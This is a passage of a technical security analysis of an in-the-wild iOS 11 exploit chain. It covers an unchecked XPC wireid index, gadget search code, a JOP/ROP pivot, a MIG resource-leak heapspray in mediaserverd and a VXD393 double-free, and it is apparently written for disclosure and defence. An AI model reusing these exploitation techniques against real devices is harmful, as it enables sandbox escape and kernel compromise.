It’s difficult to understand how this error could be introduced into a core IPC library that shipped to end users. While errors are common in software development, a serious one like this should have quickly been found by a unit test, code review or even fuzzing. It’s especially unfortunate as this location would naturally be one of the first ones an attacker would look, as I detail below.In-the-wild iOS Exploit Chain 3 - XPC + VXD393/D5500 repeated IOFreetargets: 5s through X, 11.0 through 11.4

Devices:iPhone6,1 (5s, N51AP)iPhone6,2 (5s, N53AP)iPhone7,1 (6 plus, N56AP)iPhone7,2 (6, N61AP)iPhone8,1 (6s, N71AP)iPhone8,2 (6s plus, N66AP)iPhone8,4 (SE, N69AP)iPhone9,1 (7, D10AP)iPhone9,2 (7 plus, D11AP)iPhone9,3 (7, D101AP)iPhone9,4 (7 plus, D111AP)iPhone10,1 (8, D20AP)iPhone10,2 (8 plus, D21AP)iPhone10,3 (X, D22AP)iPhone10,4 (8, D201AP)iPhone10,5 (8 plus, D211AP)iPhone10,6 (X, D221AP)

Versions:15A372 (11.0 - 19 Sep 2017)15A402 (11.0.1 - 26 Sep 2017)15A403 (11.0.2 - 26 Sep 2017 - seems to be 8/8plus only, which didn't get 15A402)15A421 (11.0.2 - 3 Oct 2017)15A432 (11.0.3 - 11 Oct 2017)15B93 (11.1 - 31 Oct 2017)15B150 (11.1.1 - 9 Nov 2017)15B202 (11.1.2 - 16 Nov 2017)15C114 (11.2 - 2 Dec 2017)15C153 (11.2.1 - 13 Dec 2017)15C202 (11.2.2 - 8 Jan 2018)15D60 (11.2.5 - 23 Jan 2018)15D100 (11.2.6 - 19 Feb 2018)15E216 (11.3 - 29 Mar 2018)15E302 (11.3.1 - 24 Apr 2018)15F79 (11.4 - 29 May 2018)

first unsupported version: 11.4.1 - 9 July 2018Binary structureStarting from this third chain the privesc binaries have a different structure. Rather than using the system loader and linking against the required symbols, they instead resolve all the required symbols themselves via dlsym (with the address of dlsym getting passed in from the JSC exploit.) Here's a snippet from the start of the symbol resolution function:

  syscall  = dlsym(RTLD_DEFAULT, "syscall");  memcpy   = dlsym(RTLD_DEFAULT, "memcpy");  memset   = dlsym(RTLD_DEFAULT, "memset");  mach_msg = dlsym(RTLD_DEFAULT, "mach_msg");  stat     = dlsym(RTLD_DEFAULT, "stat");  open     = dlsym(RTLD_DEFAULT, "open");  read     = dlsym(RTLD_DEFAULT, "read");  close    = dlsym(RTLD_DEFAULT, "close");  ...
Interestingly, this seems to be an append-only list, and there are plenty of symbols which aren't used. In Appendix A I've enumerated those, and guessed what bugs they might have been targeting with earlier versions of this framework.

Checking for prior compromise
Like PE2, after the kernel exploit has successfully run they make a system modification which can be observed from inside the sandbox. This time they add the string "iop114" to the device bootargs which can be read from inside the WebContent sandbox via the kern.bootargs sysctl:

  sysctlbyname("kern.bootargs", bootargs, &v7, 0LL, 0LL);  if (strcmp(bootargs, "iop114")) {    syslog(0, "to sleep ...");    while (1)      sleep(1000);  }Unchecked array index in xpcXPC (which probably stands for "Cross"-Process Communication) is an IPC mechanism which uses mach messages as a transport layer. It was introduced in 2011 around the time of iOS 5. XPC messages are serialized object trees, typically with a dictionary at the root. XPC also contains functionality for exposing and managing named services; newer IPC services tend to be built on XPC rather than the legacy MIG system.

XPC was marketed as a security boundary; at the 2011 Apple World Wide Developers Conference (WWDC) Apple explicitly stated the benefits of isolation via XPC as "Little to no harm if service is exploited" and that it "Minimizes impact of exploits." Unfortunately, there has been a long history of bugs in XPC; both in the core library as well as in how services used its APIs. See for example the following P0 issues: 80, 92, 121, 130, 1247, 1713. Core XPC bugs are quite useful, as they allow you to target any process which uses XPC.

This particular bug appears to have been introduced via some refactoring in iOS 11 in the way that the XPC code parses serialized xpc dictionary objects in "fast mode". Here's the old code:

struct _context {  xpc_dictionary* dict;  char* target_key;  xpc_serializer* result;  int* found};
int64 _xpc_dictionary_look_up_wire_apply(  char *current_key,  xpc_serializer* serializer,  struct _context *context){  if ( !current_key )    return 0;
  if (strcmp(context->target_key, current_key))    return _skip_value(serializer);
  // key matches; result is current state of serializer  memcpy(context->result, serializer, 0xB0);  *(context->found) = 1;  return 0;}

An xpc_serializer object is a wrapper around a raw, unparsed XPC message. (The xpc_serializer type is responsible for both serialization and deserialization.)

Here's an example serialized XPC message:

In XPC's "slow mode" an incoming message is completely deserialized into XPC objects when it's received. The fast mode instead attempts to lazily search for values inside the serialized dictionaries when they're first requested, rather than parsing everything upfront. It does this by comparing the keys in the serialized dictionary against the desired key; if the current key doesn't match they call skip_value to jump over the payload value of the current key to the next key in the serialized XPC dictionary object.
int skip_value(xpc_serializer* serializer){  uint32_t wireid;  uint64_t wire_length;
  wireid = read_id(xpc_serializer);
  if (wireid == 0x1A000)    return 0LL;
  wire_length = xpc_types[wireid >> 12]->wire_length(serializer);
  if (wire_length == -1 ||      wire_length > serializer->remaining)    return 0;    // skip over the value  xpc_serializer_advance(serializer, wire_length);  return 1;}

uint32_t read_id(xpc_serializer* serializer){  // ensure there are 4 bytes to be read; return pointer to them  wireid_ptr = xpc_serializer_read(serializer, 4, 0, 0);  if ( !wireid_ptr )    return 0x1A000;
  uint32_t wireid = *wireid_ptr;  uint32_t typeid = wireid >> 12;
  // if any bits other than 12-20 are set,  // or the type_index is 0, fail  if (wireid & 0xFFF00FFF ||      typeid == 0      typeid >= _xpc_ntypes) { // 0x19    return 0x1A000LL;  }
  return wireid;}
skip_value first calls read_id, which reads 4 bytes from the serialized message. Those four bytes are the wireid value, which tells XPC the type of the serialized value. read_id also verifies that the wireid is valid: the xpc typeid is contained in bits 12-20 of the wireid, only those bits may be set and the value of the typeid must be greater than zero and less than 0x19. If these conditions aren't met then read_id returns the sentinel wireid value of 0x1A000. skip_id checks for this sentinel return value from read_id and aborts. If read_id returns a valid wireid value, then skip_id uses the typeid bits to index the xpc_types array and call a function pointer read indirectly from there.

Let's take a look at how this code changed in iOS 11. The prototype for xpc_dictionary_look_up_wire_apply is unchanged:

int64 _xpc_dictionary_look_up_wire_apply(  char *current_key,  xpc_serializer* serializer,  struct _context *context){  if (!current_key)    return 0;
  if (strcmp(context->target_key, current_key))    return skip_id_and_value(serializer);
  memcpy(context->result, serializer, 0xB0);  *(context->found) = 1;  return 0;}
The call to skip_value has been replaced with a call to skip_id_and_value however:

int64 skip_id_and_value(xpc_serializer* serializer){  uint32_t* wireid_ptr = xpc_serializer_read(serializer, 4, 0, 0);  if (!wireid_ptr)    return 0;
  uint32_t wireid = *wireid_ptr;  if (wireid != 0x1B000)    return skip_value(xpc_serializer, wireid);    return 0;}
There's no call to read_id anymore (which was responsible for both reading and verifying the id) instead skip_id_and_value reads the four byte wireid value itself. Curiously it compares the four-byte wireid value against 0x1B000. Is this comparison supposed to actually be something like this?

  wireid < 0x1B000
Something seems very wrong.

The controlled wireid value, which can now be any value apart from 0x1B000, is passed to skip_value; which has a different prototype to before now taking a wireid in addition to the xpc_serializer:

int64skip_value(xpc_serializer* serializer, uint32_t wireid){  // declare function pointer  uint32_t (wire_length_fptr*)(xpc_serializer*);
  wire_length_fptr = xpc_wire_length_from_wire_id(wireid);  uint32_t wire_length = wire_length_fptr(serializer)
  if (wire_length == -1 ||      wire_length > serializer->remaining) {    return 0;  }  xpc_serializer_advance(serializer, wire_length);  return 1;}

uint32_t (*)(xpc_serializer*)xpc_wire_length_from_wire_id(uint32_t wireid){  return xpc_types[wireid >> 12]->wire_length;}
Not only has the prototype of skip_value changed; the precondition has changed too: it used to be the case that skip_value was responsible for verifying the wireid value in the message. That's no longer the case. The wireid value is passed directly to xpc_wire_length_from_wire_id where the lower 12-bits are shifted out and the upper 20 are used to directly index the xpc_types array. xpc_types is an array of pointers to Objective-C classes; the field at +0x90 is the wire_length function pointer, which will be called by skip_value.

What happened to all the bounds checking? Lots of code changed subtly here; the semantics of the functions changed and in the end a correct bounds check seems to have become a comparison against just a single invalid value.

Looking at the other xpc_wire_length_from_wire_id call-sites they are all dominated by calls to _xpc_class_id_from_wire_valid, which actually validates the wireid:

int xpc_class_id_from_wire_valid(uint32_t wireid){  if (((wire_id - 0x1000) < 0x1A000) &&      ((wire_id & 0xFFF00F00) == 0)) {    return 1;  }  return 0;}
It's very simple to hit this bug; anywhere between iOS 11.0 and 11.4.1 just flip a few bits in an XPC message and you'll probably hit it. This is why I believe that fuzzing or a unit test would have quickly found this issue.

XPC eXploitation
Let's take a closer look at exactly what will happen when the vulnerability is triggered:

int64 skip_id_and_value(xpc_serializer* serializer){  uint32_t* wireid_ptr = xpc_serializer_read(serializer, 4, 0, 0);  if (!wireid_ptr)    return 0;
  uint32_t wireid = *wireid_ptr;  if (wireid != 0x1B000)    return skip_value(xpc_serializer, wireid);

xpc_serializer_read returns a pointer into the raw mach message buffer; it's just ensuring that there are at least 4 bytes left to read. As long as those 4 bytes don't contain the value 0x1B000, they'll pass the checks.

Let's look at the iOS 11 version of skip_value again:

int64skip_value(xpc_serializer* serializer, uint32_t wireid){  // declare function pointer  uint32_t (wire_length_fptr*)(xpc_serializer*);
  wire_length_fptr = xpc_wire_length_from_wire_id(wireid);  uint32_t wire_length = wire_length_fptr(serializer)
Each XPC type (eg xpc_dictionary, xpc_string, xpc_uint64) defines a function to determine how large their serialized payload is. For fixed-sized objects, such as an xpc_uint64, this will just return a constant (an xpc_uint64 payload is always 8 bytes):

__xpc_uint64_wire_lengthMOV   W0, #8RET
Similarly, an xpc_uuid object always has a 0x10 byte payload:

__xpc_uuid_wire_lengthMOV   W0, #0x10RET
For variable-sized types the length needs to be read from the serialized object:

__xpc_string_wire_lengthB     __xpc_wire_length
All variable-sized xpc objects record their size in bytes directly after their wireid, so _xpc_wire_length just reads the next 4 bytes without consuming them.

_xpc_wire_length_from_wire_id looks up the correct function pointer to call:

uint32_t (*)(xpc_serializer*)xpc_wire_length_from_wire_id(uint32_t wireid){  return xpc_types[wireid >> 12]->wire_length;}
xpc_types is an array of pointers to the relevant Objective-C class objects:

__xpc_types:libxpc:__const:DCQ 0libxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_nulllibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_boollibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_int64libxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_uint64libxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_doublelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_pointerlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_datelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_datalibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_stringlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_uuidlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_fdlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_shmemlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_mach_sendlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_arraylibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_dictionarylibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_errorlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_connectionlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_endpointlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_serializerlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_pipelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_mach_recvlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_bundlelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_servicelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_service_instancelibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_activitylibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_file_transfer__xpc_ool_types:libxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_fdlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_shmemlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_mach_sendlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_connectionlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_endpointlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_mach_recvlibxpc:__const:DCQ _OBJC_CLASS_$_OS_xpc_file_transfer
The value at offset +0x90 in each xpc type's class object is its wire_length function pointer. That function pointer will be called with one argument, which is a pointer to the current xpc_serializer object.

This gives quite an interesting exploitation primitive:

They control an array index i, which can be between 0x1c and 0x100000 (since it's the upper 20 bits of the controlled wireid value). That will index the xpc_types array, in the const segment of the libxpc.dylib library in the shared cache. The code will read the pointer at the offset they provide (without bounds checking) then call the function pointer at offset +0x90 from that:

When F_PTR gets called, no register will point to controlled data. X0 will point to the current xpc_serializer, so that seems like the logical choice for targeting to make something more interesting happen. The relevant fields of an xpc_serializer object which can be indirectly controlled are:
+0x28 = buffer+0x30 = buffer_size+0x38 = current_position_in_buffer_ptr+0x40 = remaining to be consumed+0x48 = NULL
So the goal is to find a value i between 0x1C and 0x100000 such that the i'th pointer from the start of the xpc_types array contains a pointer to a structure, which at offset +0x90 has a function pointer which when called will do something interesting with the values at offsets +0x28 or +0x38 from X0, probably calling a function pointer from there and giving better register control.

Sounds fun! How do they do it?
One in a millionAt runtime they check each possible value of i, looking for a situation where F_PTR ends up pointing to code which matches one of the two following signatures:

Candidate A:upper 8 bits of previous instruction must be 0x17upper 16 bits of target F_PTR instruction must be 0x17ffnext instruction must be 0xd1004000 (sub x0, x0, #0x10)
Candidate B:
gadget pointer must point to a sequence of 9 instructions matching the following template0 STP             X20, X19, [SP,#-0x20]!1 STP             X29, X30, [SP,#0x10]2 ADD             X29, SP, #0x103 MOV             X19, X04 *5 *6 add x9, x8, #0x107 *8 add x8, x8, #0x1e0
I re-implemented their gadget search code and tested it on a few devices to see what it finds:

#include "xpc.h"#include <dlfcn.h>#include <string.h>
int syscall(int, ...);
void* xpc_null_create(void);
void find_it() {  void* handle = dlopen("/usr/lib/system/libxpc.dylib", 2);  if (!handle) {    printf("unable to dlopen libxpc\n");    return;  }      printf("handle: %p\n", handle);      void* xpc_type_null = dlsym(handle, "_xpc_type_null");  printf("xpc_type_null: %p\n", xpc_type_null);      void** xpc_null = xpc_null_create();  printf("xpc_null: %p\n", xpc_null);      xpc_null -= 2;  uint8_t* xpc_types = NULL;      for (int i = 0; i < 0x10000; i++) {    if (*xpc_null == xpc_type_null) {      xpc_types = (uint8_t*)(xpc_null - 1);      break;    }    xpc_null--;  }      if (xpc_types == NULL) {    printf("didn't find xpc_types\n");    return;  }      printf("found xpc_types here: %p\n", xpc_types);      uint8_t* shared_cache_base = NULL;  syscall(294, &shared_cache_base);  printf("shared_cache_base: %p\n", shared_cache_base);      // how big is the cache mapping which we can potentially point to?  uint32_t mapping_offset = *(uint32_t*)(shared_cache_base+0x10);  uint32_t n_mappings = *(uint32_t*)(shared_cache_base+0x14);      uint8_t* mapping_info = shared_cache_base+mapping_offset;      uint64_t cache_size = 0;    for (int i = 0; i < n_mappings-1; i++) {    cache_size += *(uint64_t*)(mapping_info+0x08);    mapping_info += 0x20;  }      printf("cache_size: %llx\n", cache_size);      for (int i = 0; i < 0x7fffff; i++) {    // try each typeid and see what gadget we hit:    uint8_t* type_struct_ptr = (xpc_types + (8*i));    uint8_t* type_struct = *(uint8_t**)(type_struct_ptr);            if ((type_struct > shared_cache_base) &&        (type_struct < (shared_cache_base+cache_size)))    {      uint8_t* fptr = *(uint8_t**)(type_struct+0x90);      if (fptr > shared_cache_base && fptr < (shared_cache_base + cache_size))      {        // try the shorter signature        if (instr[-1] >> 0x18 == 0x17 &&            instr[0] >> 0x10 == 0x17ff &&            instr[1] == 0xD1004000) {            printf("shorter sequence match at %p\n", fptr);         }                        // try the longer signature        uint32_t gadget[4] = {0xA9BE4FF4,  // STP X20, X19, [SP,#-0x20]!                              0xA9017BFD,  // STP X29, X30, [SP,#0x10]                              0x910043FD,  // ADD X29, SP, #0x10                              0xAA0003F3}; // MOV  X19, X0        uint32_t* instr = (uint32_t*)fptr;
        if((memcmp(fptr, (void*)gadget, 0x10) == 0) &&           instr[6] == 0x91004109 &&       // ADD X9, X8, #0x10           instr[8] == 0x91078108)         // ADD X8, X8, #0x1e0        {          printf("potential initial match here: %p\n", fptr);        }      }    }  }  printf("done\n");}
The candidate B signature matches the following function in libfontparser:

TXMLSplicedFont::~TXMLSplicedFont(TXMLSplicedFont *__hidden this)
var_10= -0x10var_s0=  0
STP   X20, X19, [SP,#-0x10+var_10]!STP   X29, X30, [SP,#0x10+var_s0]ADD   X29, SP, #0x10MOV   X19, X0ADRP  X8, #__ZTV15TXMLSplicedFont@PAGE ; `vtable for'TXMLSplicedFontADD   X8, X8, #__ZTV15TXMLSplicedFont@PAGEOFF ; `vtable for'TXMLSplicedFontADD   X9, X8, #0x10STR   X9, [X19]ADD   X8, X8, #0x1E0STR   X8, [X19,#0x10]ADD   X0, X19, #0x48 ; 'H' ; thisBL    __ZN13TCFDictionaryD2Ev ; TCFDictionary::~TCFDictionary()ADD   X0, X19, #0x30 ; '0' ; thisBL    __ZN26TDataForkFileDataReferenceD1Ev ; TDataForkFileDataReference::~TDataForkFileDataReference()MOV   X0, X19 ; thisLDP   X29, X30, [SP,#0x10+var_s0]LDP   X20, X19, [SP+0x10+var_10],#0x20B     __ZN5TFontD2Ev ; TFont::~TFont()
Candidate A matches a branch instruction to that same code:

B     0x1856b1cd4 ; TXMLSplicedFont::~TXMLSplicedFont()
Let's step through that TXMLSplicedFont destructor code to see what happens. Remember that at this point X0 points to an xpc_serializer object:

MOV   X19, X0ADRP  X8, #__ZTV15TXMLSplicedFont@PAGE ; `vtable for'TXMLSplicedFontADD   X8, X8, #__ZTV15TXMLSplicedFont@PAGEOFF ; `vtable for'TXMLSplicedFontADD   X9, X8, #0x10STR   X9, [X19]
This writes the TXMLSplicedFont vtable pointer over the first 8 bytes of the xpc_serializer; no problem.

ADD   X8, X8, #0x1E0STR   X8, [X19,#0x10]
This writes another vtable pointer over the 8 bytes at offset +0x10; still fine.

ADD   X0, X19, #0x48 ; 'H' ; thisBL    __ZN13TCFDictionaryD2Ev ; TCFDictionary::~TCFDictionary()
This adds 0x48 to X0 and passes that pointer value as the first argument to the TCFDictionary destructor:

voidTCFDictionary::~TCFDictionary(TCFDictionary *__hidden this)
var_10= -0x10var_s0=  0
STP   X20, X19, [SP,#-0x10+var_10]!STP   X29, X30, [SP,#0x10+var_s0]ADD   X29, SP, #0x10MOV   X19, X0LDR   X0, [X19]CBZ   X0, loc_18428B484...loc_18428B484MOV   X0, X19LDP   X29, X30, [SP,#0x10+var_s0]LDP   X20, X19, [SP+0x10+var_10],#0x20RET
Since the value at +0x48 will be NULL, this will just return. Back in ~TXMLSplicedFont:

ADD   X0, X19, #0x30 ; '0' ; thisBL    __ZN26TDataForkFileDataReferenceD1Ev ;TDataForkFileDataReference::~TDataForkFileDataReference()
This adds 0x30 to the xpc_serializer pointer and passes that to the TDataForkFileDataReference destructor:

TDataForkFileDataReference::~TDataForkFileDataReference(TDataForkFileDataReference *__hidden this)B     __ZN18TFileDataSurrogateD2Ev ; TFileDataSurrogate::~TFileDataSurrogate()
This directly calls the TFileDataSurrogate destructor:

voidTFileDataSurrogate::~TFileDataSurrogate(TFileDataSurrogate *__hidden this)
var_18= -0x18var_10= -0x10var_s0=  0
SUB   SP, SP, #0x30STP   X20, X19, [SP,#0x20+var_10]STP   X29, X30, [SP,#0x20+var_s0]ADD   X29, SP, #0x20MOV   X19, X0ADRP  X8, #__ZTV18TFileDataSurrogate@PAGE ; `vtable for'TFileDataSurrogateADD  X8, X8, #__ZTV18TFileDataSurrogate@PAGEOFF ; `vtable for'TFileDataSurrogateADD  X8, X8, #0x10STR  X8, [X19] ; trash +0x30; no problemLDR  X0, [X19,#8] ; read from serializer+0x38, which is the pointer to the current position in the bufferLDR  X8, [X0,#0x18]! ; read at offset +0x18, and bump up X0 to point to thereLDR  X8, [X8,#0x20] ; X8 is controlled now; read function pointerBLR  X8 ; control!
On entry to this function X0 points 0x30 bytes into the xpc_serializer object. Let's recall the those xpc_serializer fields again:

+0x28 = buffer+0x30 = buffer_size+0x38 = current_position_in_buffer_ptr+0x40 = remaining to be consumed+0x48 = NULL
STR  X8, [X19] will overwrite the buffer_size field with a vtable; could be interesting but it at least won't cause anything bad to happen right away.

The next instruction LDR  X0, [X19,#8] will load the xpc_serializer buffer position pointer in to X0; now X0 points in to the serialized xpc message buffer. They're definitely getting closer to arbitrary control now.

LDR  X8, [X0,#0x18]! will load the 8-byte value at offset +0x18 from the current xpc_serializer buffer position into X8, and update X0 to point to there. That means X8 could be arbitrarily-controlled, depending on the structure of the serialized XPC message.

The final two instructions then load a function pointer from an offset from X8 and call it:

LDR  X8, [X8,#0x20]BLR  X8
It's quite neat really. I'd be interested to know the process behind finding this target gadget; it's a good candidate for techniques like symbolic execution. It could also have been found by just testing all the possible values and looking for interesting-looking crashes.
The messageAt first glance (and a few subsequent glances) the code in the exploit which builds the trigger XPC message looks like it surely can't be a trigger:

xpc_dictionary = xpc_dictionary_create(0LL, 0LL, 0LL);xpc_true = xpc_bool_create(1);xpc_dictionary_set_value(xpc_dictionary, crafted_dict_entry_key_containing_value, xpc_true);xpc_dictionary_set_value(xpc_dictionary, invalid_dict_entry_key, xpc_connection);xpc_connection_send_message(xpc_connection, xpc_dictionary);
They create an XPC dictionary with two keys, and two values, then send it...? There must be more than meets the eye here, and indeed there is :)

Here's xpc_connection_serialize, circa iOS 11.0:

int64xpc_connection_serialize(xpc_object* connection, xpc_serializer* serializer){  syslog(3, "Connections cannot be directly embedded in messages. You must create an endpoint from the connection.");}
All it does is log an error message and return. The problem here is that this gets the serializer out-of-sync. Specifically the xpc_dictionary serializer doesn't expect to be serializing non-serializable objects such as xpc_connections. The XPC dictionary serialization format is essentially a total length, followed by a sequence of alternating null-terminated keys and values. If a value serializer doesn't emit any bytes (such as the xpc_connection one above) then the serializer will continue to emit the next key in the dictionary, and then the next value. But there is no way in XPC to have a serialized dictionary key with no value; which means the XPC deserialization code is going to interpret the bytes of the following key as the previous key's value! Note that this isn't a security issue; the sender has arbitrary control of these bytes anyway, but it's a very neat trick to avoid having to write an entire XPC serialization library.

This is the relevant section of the serialized xpc dictionary. Using the xpc_connection_serialize trick the second key will be sent where a value should be such that the xpc lazy deserialization code will see the bad_wireID value as a wire_ID. When the out-of-bounds read occurs the xpc_serializer's current buffer position pointer will point just after the bad_wireID value. 0x18 bytes after that is a pointer to an address they target with a heapspray, and at offset +0x20 from that address a function pointer will be read and called.
HeapsprayThey've reached the point where they need controlled data at a controlled address. The attackers decided to use a heapspray rather than do this in a controlled way (by for example using another bug to allow them to disclose remote pointers.)
They actually use two similar primitives to spray a large number memory regions and mach port send rights in the target process.

I and others have published many writeups over the years about MIG and it's complex ownership semantics. The focus was on places where those semantics lead to exploitable vulnerability, but those same complex semantics can lead to resource leaks which is precisely what the attackers are after here.

We'll return to the contents of the heapspray region later, but for now let's see how they leak it in the mediaserverd process. This daemon is targeted because its sandbox profile allows it to open a connection to the vulnerable IOKit driver used in the kernel exploit.
mediaserverdmediaserverd hosts a lot of services; the attackers target which is implemented in the Celestial framework. The targeted service starts with FigRecorderServerStart which calls bootstrap_check_in to get a receive right to vend the service. That port gets wrapped in a CFMachPort by CFMachPortCreateWithPort. From that CFMachPort they create a run loop source via CFMachPortCreateRunLoopSource. This sets up a basic mach message event handling system, where the following function will be called by the run loop code when a mach message is received on the service port:

voidFIG_recorder_mach_msg_handler(CFMachPortRef cfport,                              mach_msg_header_t *request_msg                              CFIndex size,                              void* info){  char reply_msg[0x290];  kern_return_t err;  if ( request_msg->msgh_id == MACH_NOTIFY_DEAD_NAME ) {    mach_dead_name_notification_t* notification =      (mach_dead_name_notification_t*) request_msg;    mach_port_name_t dead_name = notification->not_port;    ...    // look dead_name up in a linked-list and destroy    // some resources if found    ...    // calls mach_port_deallocate    FigMachPortReleaseSendRight(dead_name, 0, 0, 0, 0);  } else {    FIG_demux(request_msg, (mach_msg_header_t*)reply_msg);    mach_msg((mach_msg_header_t*)reply_msg,             1,             reply_msg.msgh_size,             0,             0,             0,             0);   } }
CFMachPorts are a very simple wrapper around receiving mach messages; they know nothing about MIG. The callback for the CFMachPort must then take care of it.

This code presents many issues. Firstly, an anti-pattern that seems common across Apple code is the failure to check that the notification isn't spoofed; really the only proper way to correctly handle mach port lifetime notification messages is to never multiplex them onto service ports. They also parse the potentially spoofed message incorrectly; MACH_NOTIFY_DEAD_NAME notification messages don't carry rights and don't have the MSGH_COMPLEX bit set, yet they still drop a send right on a port name read from the body of the message.

But those bugs aren't relevant to what we're looking at; in the else branch they call the auto-generated MIG demux function:

intFIG_demux(mach_msg_header_t *msg_request, mach_msg_header_t *msg_reply){  mig_routine_t routine;
  msg_reply->msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REPLY(msg_request->msgh_bits), 0);  msg_reply->msgh_remote_port = msg_request->msgh_remote_port;
  msg_reply->msgh_size = (mach_msg_size_t)sizeof(mig_reply_error_t);  msg_reply->msgh_id = msg_request->msgh_id + 100;  msg_reply->msgh_local_port = MACH_PORT_NULL;  msg_reply->msgh_reserved = 0;
  routine_index = msg_request->msgh_id - 12080;  routine = FigRecorderRemoteServer_figrecorder_subsystem[method_index].stub_routine;
  if (routine_index > 0x16 || !routine) {    (mig_reply_error_t *)msg_reply->NDR = NDR_record_0;    (mig_reply_error_t *)msg_reply->RetCode = MIG_BAD_ID;    return FALSE;  }
  (routine)(msg_request, msg_reply);  return TRUE;}
Note that it does return a value indicating whether the message was passed to a handler routine or not. But this is ignored by their CFMachPort handler. The CFMachPort handler also fails to check what the MIG return code was; and they completely fail to handle the cases when either the MIG method failed (and therefore, shouldn't have kept handles to any resources) or the msgh_id wasn't recognised (and therefore the request message wasn't handled at all.) This means that any unexpected messages will just be ignored rather than correctly destroyed (via eg mach_msg_destroy) and any resources contained in those messages will be leaked in the server process.

The exploit sends a mach message with msgh_id of 51, which isn't recognised by the FigRecorderRemoteServer_figrecorder_subsystem, so any resources contained in it are immediately leaked.

They send a mach message with 1,000 OOL memory descriptors, each of which contains 10MBs of copies of the same target 4kB block of memory containing the heapspray. They hope that one of these ends up  at the heapspray target address of 0x120808000. The virtual memory for received OOL memory descriptors will be allocated in the receiver by the kernel, via mach_vm_allocate. This uses a very basic lowest-to-highest first fit algorithm for allocation. This heapspray technique is therefore quite reliable, and due to the virtual memory optimisations used by XNU when sending OOL memory, quite low-overhead too.

As well as spraying memory they also spray mach port send rights; again abusing the fact that doesn't implement a proper MIG server. They allocate over 12,000 receive rights; give themselves a send right to each, then move the receive rights into a portset. They send all the send rights via an out-of-line ports descriptor to the service, where the  names are promptly leaked because of the improper message handling.

The reason they send so many send rights is to be able to guess a mach port name which will be valid in the mediaserverd task and for which the attacker holds the receive right. Then by sending mach messages to that port they can exfiltrate resources (such as IOKit user client connections) from the target.
JOP2ROPThe initial PC control sequence we saw earlier ended like this:

LDR  X8, [X0,#0x18]! ; read at offset +0x18, and bump up x0 to point to thereLDR  X8, [X8,#0x20]  ; X8 is controlled now; read function pointerBLR  X8           ; PC control!
At the start of that sequence, X0 points to the end of the bad wireid value, so the first instruction will read a controlled qword from 0x18 bytes past the wireid into X8. The ! after the memory operand means that X0 will be post-updated, meaning it will have 0x18 added to it after this instruction has used the value. 0x18 bytes past the bad wireid value they put the heapspray target pointer (0x120808080), so X8 has the value 0x120808080, and X0 is a pointer to the value 0x120808080.

The second instruction reads a qword from 0x1208080A0 into X8, and the third instruction calls that value.

Here's an annotated dump of the heapspray region which actually serves three separate purposes:
  1. places initial JOP gadget pointers at know locations
  2. is pivoted to as the ROP stack
  3. contains the outline mach messages to be sent back to the attackers process via the sprayed send rights

offset +000 here is the heapspray target address of 0x120808080:

The local_ports[] array contains the addresses on the heapspray target pages of the exfil mach message's msgh_local_port fields. That's where the ROP writes 8 copies of the opened userclient port.

Those messages themselves are also on the heapspray page, with their msgh_remote_port fields filled in with the 8 guesses for the port-sprayed send rights.

After sending the trigger message the attackers listen for a message on the portset containing all the sprayed ports. If they receive a message with a msgh_id value of 0x1337 then the msgh_remote_port field (the reply port) contains a send right to the video decoding accelerator IOKit userclient which can't be accessed from inside the sandbox.
Video decoder accelerator repeated IOFreeThe kernel bug is in the AppleVXD393 and D5500 userclients, which seem to be responsible for some sort of video decoding involving DRM and decryption.
I independently found this bug while reading through the symbol names in the iOS 12 beta 1 release (which Apple didn't strip symbols from), but by then it had already been fixed in stable builds. Of course, iOS kernels are normally stripped of symbols prior to release so it would have taken some reversing or fuzzing to find this otherwise.

The userclient has 9 external methods:

Generally any IOKit userclient which has external methods with names that sound like they're involved in object lifetime management are suspicious. The lifetime of the userclient is handled implicitly by two things: it's relationship to its owning mach port (which will cause no-senders notifications to be sent when there are no more clients) and OSObject references, which will cause the destruction of the object when there are no more references.

Looking through the list of methods immediately the second one jumps out; what might happen if we destroy a decoder twice?

The relevant code in the DestroyDecoder implementation is here:

AppleVXD393UserClient::DestroyDecoder(__int64 this, __int64 a2, _WORD *out_buf) { ...  char tmp_buf[0x68];  // make a temporary copy of the structure at +0x270 in the UserClient object  memmove(tmp_buf, (const void *)(this + 0x270), 0x68uLL);
  // pass that copy to ::DeallocateMemory  err = AppleVXD393UserClient::DeallocateMemory(this, tmp_buf);  if ( err ) {    SMDLog("AppleVXD393UserClient::DestroyDecoder error deallocating input buffer ");  }
